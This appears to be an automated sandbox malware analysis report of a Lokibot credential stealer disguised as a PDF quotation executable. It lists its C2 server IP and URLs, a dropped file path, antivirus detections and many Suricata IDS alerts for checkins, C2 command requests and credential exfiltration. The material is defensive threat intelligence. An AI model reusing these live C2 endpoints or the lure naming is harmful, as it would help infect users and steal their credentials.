2025-01-07T12:33:52.222675+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50130	94.156.177.41	80	TCP
2025-01-07T12:33:53.621252+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50131	94.156.177.41	80	TCP
2025-01-07T12:33:54.519173+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50132	94.156.177.41	80	TCP
2025-01-07T12:33:55.412870+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50133	94.156.177.41	80	TCP
2025-01-07T12:33:56.462921+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50134	94.156.177.41	80	TCP
2025-01-07T12:33:57.340598+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50135	94.156.177.41	80	TCP
2025-01-07T12:33:58.239632+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50136	94.156.177.41	80	TCP
2025-01-07T12:33:59.128389+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50137	94.156.177.41	80	TCP
2025-01-07T12:33:59.979403+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50138	94.156.177.41	80	TCP
2025-01-07T12:34:01.024157+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50139	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://94.156.177.41/mars/five/fre.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Quotation2025-0107pdf.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Unpacked PE file: 0.2.Quotation2025-0107pdf.exe.ce0000.0.unpack

Source: Quotation2025-0107pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Quotation2025-0107pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_0305C36C
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_0305DE68
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	9_2_023FC36C
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	9_2_023FDE68

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49810 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49810 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49742 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49742 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49742 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49780 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49780 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49780 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49742 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49742 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49780 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49774 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49774 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49774 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49774 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49774 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49810 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49766 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49810 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49810 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49759
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49791
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49774
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49766
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49780 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49778 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49778 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49778 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49758
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49778 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49779 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49754
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49779 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49779 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49781 -> 94.156.177.41:80
